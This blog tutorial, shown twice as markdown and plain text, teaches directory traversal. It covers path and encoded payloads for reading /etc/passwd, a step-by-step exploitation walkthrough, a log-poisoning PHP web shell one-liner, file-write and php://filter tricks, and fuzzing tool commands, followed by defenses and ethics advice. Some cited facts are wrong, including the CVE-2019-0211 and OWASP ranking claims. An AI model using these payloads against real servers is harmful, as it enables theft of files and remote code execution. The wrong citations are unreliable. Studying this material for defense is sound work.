[upl-image-preview uuid=4045c452-3bd8-47ac-bf80-ffa44dd9e327 url=https://hacklivly.com/assets/files/2025-03-12/1741800069-212027-directory-traversal-examples-testing-1200x630-1.png alt={TEXT?}] **Hey guys, Rocky here!** 🚪🔓 Welcome to **Day 9** of the *Daily Web Hacking* series! So far, we’ve tackled [authentication bypasses](https://hacklivly.com/blog/46-web-hacking-series-part-8-authentication-bypass), [file upload vulns](https://hacklivly.com/blog/45-web-hacking-series-part-7-file-upload-vulnerabilities), and [XSS](https://hacklivly.com/blog/40-web-hacking-series-part-4-cross-site-scripting-xss). Today, we’re diving into **Part 9: Directory Traversal**—the hack that lets you “escape” a website’s restricted folders and rummage through the server’s entire file system. Imagine breaking out of a prison cell only to find the warden’s secret file cabinet. Let’s get into it! --- ### **What is Directory Traversal?** Directory Traversal (aka **Path Traversal**) is a vulnerability that allows attackers to read, write, or execute files **outside the web root directory** (the folder where the website’s public files live). By manipulating file paths (e.g., `../../`), hackers can: * Steal sensitive files (`/etc/passwd`, `.env`, backups). * Access source code or configuration files. * Plant malware or overwrite critical system files. **Why it’s dangerous**: * **#4** in the OWASP Top 10 ([Path Traversal, 2021](https://owasp.org/www-project-top-ten/)). * Found in **33% of web apps** ([Snyk, 2023](https://snyk.io/)). * Can lead to **full server compromise**. --- ### **How Directory Traversal Works** Web apps often use user-supplied input to load files (e.g., profile pictures, PDFs). If the app doesn’t sanitize input properly, attackers can inject path sequences like `../` to “escape” the web root. **Example**: A site loads user avatars via: ``` https://site.com/load?file=rocky.jpg ``` An attacker changes `file=rocky.jpg` to: ``` file=../../../../etc/passwd ``` **Result**: The server returns the `/etc/passwd` file, exposing system users! --- ### **Types of Directory Traversal** #### **1. Basic Traversal** * Use `../` (Unix) or `..\` (Windows) to climb directories. * **Payload**: ``` ../../../../etc/passwd ``` #### **2. Encoded Traversal** * Bypass filters with URL encoding, double encoding, or Unicode. * **Payloads**: * URL-encoded: `..%2F..%2Fetc%2Fpasswd` * Double-encoded: `..%252F..%252Fetc%252Fpasswd` #### **3. Null Byte Injection** * Terminate the filename early to bypass appending extensions. * **Payload**: ``` ../../etc/passwd%00.jpg ``` * The server processes `passwd%00` as `passwd`, ignoring `.jpg`. #### **4. Absolute Path Abuse** * Directly reference absolute paths (if allowed). * **Payload**: ``` /etc/passwd ``` --- ### **Real-World Directory Traversal Disasters** * **Apache (2019)**: `CVE-2019-0211` allowed traversal via PHP scripts. * **WordPress (2017)**: Plugin flaw exposed `wp-config.php` files. * **Tesla (2018)**: Misconfigured servers leaked vehicle telemetry. **Lesson**: Even tech giants mess up. --- ### **Step-by-Step Exploitation** **Goal**: Steal the `/etc/passwd` file from a vulnerable photo-sharing site. #### **1. Find a Vulnerable Endpoint** * Look for parameters like `?file=`, `?page=`, or `?load=`. * Example URL: ``` https://hacklivly.com/view?image=profile.jpg ``` #### **2. Test Basic Traversal** * Modify the parameter: ``` image=../../../../etc/passwd ``` * If the server returns the file, you’ve won! #### **3. Bypass Filters** * If blocked, try encoding: ``` image=..%2F..%2Fetc%2Fpasswd ``` * Or add a null byte: ``` image=../../etc/passwd%00.jpg ``` #### **4. Escalate Access** * **Steal config files**: `.env`, `config.php`, `wp-config.php`. * **Execute code**: If you can write files, upload a web shell. --- ### **Advanced Traversal Tactics** #### **1. Writing Files** * **How**: If the app lets you upload or modify files. * **Payload**: ``` ../../var/www/html/shell.php ``` * **Impact**: Execute commands via `https://site.com/shell.php`. #### **2. Log Poisoning** * Inject PHP into log files (e.g., `access.log`), then traverse to them: ``` GET / ``` * Trigger execution: ``` https://site.com/view?file=../../var/log/apache2/access.log&cmd=id ``` #### **3. PHP Wrappers** * Use `php://filter` to read encoded files: ``` file=php://filter/convert.base64-encode/resource=../../etc/passwd ``` * Decode the Base64 output to get the file. --- ### **Tools for Directory Traversal** #### **1. Burp Suite** * **Repeater**: Test payloads manually. * **Intruder**: Brute-force common paths (`/etc/passwd`, `.env`). #### **2. DotDotPwn** * Automated directory traversal tool: ```bash dotdotpwn -m http -h hacklivly.com -x /load?file=TRAVERSAL ``` #### **3. FFUF (Fuzz Faster U Fool)** * Fuzz for exposed files: ```bash ffuf -w paths.txt -u https://hacklivly.com/view?file=FUZZ ``` --- ### **Defending Against Directory Traversal** #### **For Developers** 1. **Input Validation** * Block `../`, `..\`, and absolute paths. * **PHP Example**: ```php $file = basename($_GET['file']); // Strips path info ``` 2. **Whitelist Allowed Files** * Use a mapping of allowed filenames: ```python allowed_files = {"profile.jpg": "images/profile.jpg"} file = allowed_files.get(request.args.get('file'), "default.jpg") ``` 3. **Use Platform-Safe Functions** * **Python**: `os.path.realpath()` + check if path starts with web root. * **Java**: `Path.normalize()` + validate. 4. **Store Files Outside Web Root** * Serve files via a secure proxy script. #### **For Admins** 1. **File Permissions** * Restrict read/write access to web directories. ```bash chmod 755 /var/www/html ``` 2. **Web Application Firewall (WAF)** * Block requests with `../`, `etc/passwd`, etc. 3. **Log Monitoring** * Alert on repeated traversal attempts. --- ### **Practice Legally: Labs & Challenges** 1. **DVWA (Damn Vulnerable Web App)**: * Practice traversal in the *File Inclusion* module. 2. **PortSwigger Labs**: * Free labs: [Directory Traversal](https://portswigger.net/web-security/file-path-traversal). 3. **Hack The Box**: * Machines like **Traverxec** focus on path traversal. --- ### **Ethical Hacking & Reporting** **Never** exploit traversal vulns without permission. If you find one: 1. **Document**: Record steps to reproduce. 2. **Report**: Use the site’s security contact or bug bounty program. 3. **Disclose**: Wait for a fix before sharing publicly. --- ### **Final Thoughts** Directory traversal is the digital equivalent of picking a lock. It’s simple, silent, and shockingly effective. By validating inputs, hardening servers, and thinking like a hacker, you can slam the door on this attack. **Remember**: The web’s security depends on you. Find flaws, fix them, and keep the internet safe—one `../` at a time. **Rocky out!** ✌️ --- **P.S.** If you’re loving this series, share it with your crew! Let’s turn script kiddies into security guardians. **Discussion Question**: What’s the wildest file you’ve accessed via traversal? I once found a **database backup** chilling in `/var/backups`. 😅 Spill your stories below! 👇

Web Hacking Series - Part 9: Directory Traversal – Escaping the Web Root Jail🔓📂🚀

rocky

Hey guys, Rocky here! 🚪🔓

Welcome to Day 9 of the Daily Web Hacking series! So far, we’ve tackled authentication bypasses, file upload vulns, and XSS. Today, we’re diving into Part 9: Directory Traversal—the hack that lets you “escape” a website’s restricted folders and rummage through the server’s entire file system. Imagine breaking out of a prison cell only to find the warden’s secret file cabinet. Let’s get into it!

—

What is Directory Traversal?

Directory Traversal (aka Path Traversal) is a vulnerability that allows attackers to read, write, or execute files outside the web root directory (the folder where the website’s public files live). By manipulating file paths (e.g., ../../), hackers can:

Steal sensitive files (/etc/passwd, .env, backups).
Access source code or configuration files.
Plant malware or overwrite critical system files.

Why it’s dangerous:

#4 in the OWASP Top 10 (Path Traversal, 2021).
Found in 33% of web apps (Snyk, 2023).
Can lead to full server compromise.

—

How Directory Traversal Works

Web apps often use user-supplied input to load files (e.g., profile pictures, PDFs). If the app doesn’t sanitize input properly, attackers can inject path sequences like ../ to “escape” the web root.

Example:
A site loads user avatars via:

https://site.com/load?file=rocky.jpg

An attacker changes file=rocky.jpg to:

file=../../../../etc/passwd

Result: The server returns the /etc/passwd file, exposing system users!

—

Types of Directory Traversal

1. Basic Traversal

Use ../ (Unix) or ..\ (Windows) to climb directories.

Payload:

  ../../../../etc/passwd

2. Encoded Traversal

Bypass filters with URL encoding, double encoding, or Unicode.
Payloads:
- URL-encoded: ..%2F..%2Fetc%2Fpasswd
- Double-encoded: ..%252F..%252Fetc%252Fpasswd

3. Null Byte Injection

Terminate the filename early to bypass appending extensions.

Payload:

  ../../etc/passwd%00.jpg

The server processes passwd%00 as passwd, ignoring .jpg.

4. Absolute Path Abuse

Directly reference absolute paths (if allowed).

Payload:

  /etc/passwd

—

Real-World Directory Traversal Disasters

Apache (2019): CVE-2019-0211 allowed traversal via PHP scripts.
WordPress (2017): Plugin flaw exposed wp-config.php files.
Tesla (2018): Misconfigured servers leaked vehicle telemetry.

Lesson: Even tech giants mess up.

—

Step-by-Step Exploitation

Goal: Steal the /etc/passwd file from a vulnerable photo-sharing site.

1. Find a Vulnerable Endpoint

Look for parameters like ?file=, ?page=, or ?load=.

Example URL:

  https://hacklivly.com/view?image=profile.jpg

2. Test Basic Traversal

Modify the parameter:

  image=../../../../etc/passwd

If the server returns the file, you’ve won!

3. Bypass Filters

If blocked, try encoding:

  image=..%2F..%2Fetc%2Fpasswd

Or add a null byte:

  image=../../etc/passwd%00.jpg

4. Escalate Access

Steal config files: .env, config.php, wp-config.php.
Execute code: If you can write files, upload a web shell.

—

Advanced Traversal Tactics

1. Writing Files

How: If the app lets you upload or modify files.

Payload:

  ../../var/www/html/shell.php

Impact: Execute commands via https://site.com/shell.php.

2. Log Poisoning

Inject PHP into log files (e.g., access.log), then traverse to them:

  GET /<?php system($_GET['cmd']); ?>

Trigger execution:

  https://site.com/view?file=../../var/log/apache2/access.log&cmd=id

3. PHP Wrappers

Use php://filter to read encoded files:

  file=php://filter/convert.base64-encode/resource=../../etc/passwd

Decode the Base64 output to get the file.

—

Tools for Directory Traversal

1. Burp Suite

Repeater: Test payloads manually.
Intruder: Brute-force common paths (/etc/passwd, .env).

2. DotDotPwn

Automated directory traversal tool:

  dotdotpwn -m http -h hacklivly.com -x /load?file=TRAVERSAL

3. FFUF (Fuzz Faster U Fool)

Fuzz for exposed files:

  ffuf -w paths.txt -u https://hacklivly.com/view?file=FUZZ

—

Defending Against Directory Traversal

For Developers

Input Validation

Block ../, ..\, and absolute paths.

PHP Example:

     $file = basename($_GET['file']); // Strips path info

Whitelist Allowed Files

Use a mapping of allowed filenames:

     allowed_files = {"profile.jpg": "images/profile.jpg"}  
     file = allowed_files.get(request.args.get('file'), "default.jpg")

Use Platform-Safe Functions
- Python: os.path.realpath() + check if path starts with web root.
- Java: Path.normalize() + validate.
Store Files Outside Web Root
- Serve files via a secure proxy script.

For Admins

File Permissions

Restrict read/write access to web directories.

   chmod 755 /var/www/html

Web Application Firewall (WAF)
- Block requests with ../, etc/passwd, etc.
Log Monitoring
- Alert on repeated traversal attempts.

—

Practice Legally: Labs & Challenges

DVWA (Damn Vulnerable Web App):
- Practice traversal in the File Inclusion module.
PortSwigger Labs:
- Free labs: Directory Traversal.
Hack The Box:
- Machines like Traverxec focus on path traversal.

—

Ethical Hacking & Reporting

Never exploit traversal vulns without permission. If you find one:

Document: Record steps to reproduce.
Report: Use the site’s security contact or bug bounty program.
Disclose: Wait for a fix before sharing publicly.

—

Final Thoughts

Directory traversal is the digital equivalent of picking a lock. It’s simple, silent, and shockingly effective. By validating inputs, hardening servers, and thinking like a hacker, you can slam the door on this attack.

Remember: The web’s security depends on you. Find flaws, fix them, and keep the internet safe—one ../ at a time.

Rocky out! ✌️

—

P.S. If you’re loving this series, share it with your crew! Let’s turn script kiddies into security guardians.

Discussion Question: What’s the wildest file you’ve accessed via traversal? I once found a database backup chilling in /var/backups. 😅 Spill your stories below! 👇